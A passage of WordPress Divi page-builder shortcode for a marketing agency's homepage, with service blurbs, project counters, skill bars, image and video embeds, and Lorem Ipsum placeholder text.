custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work 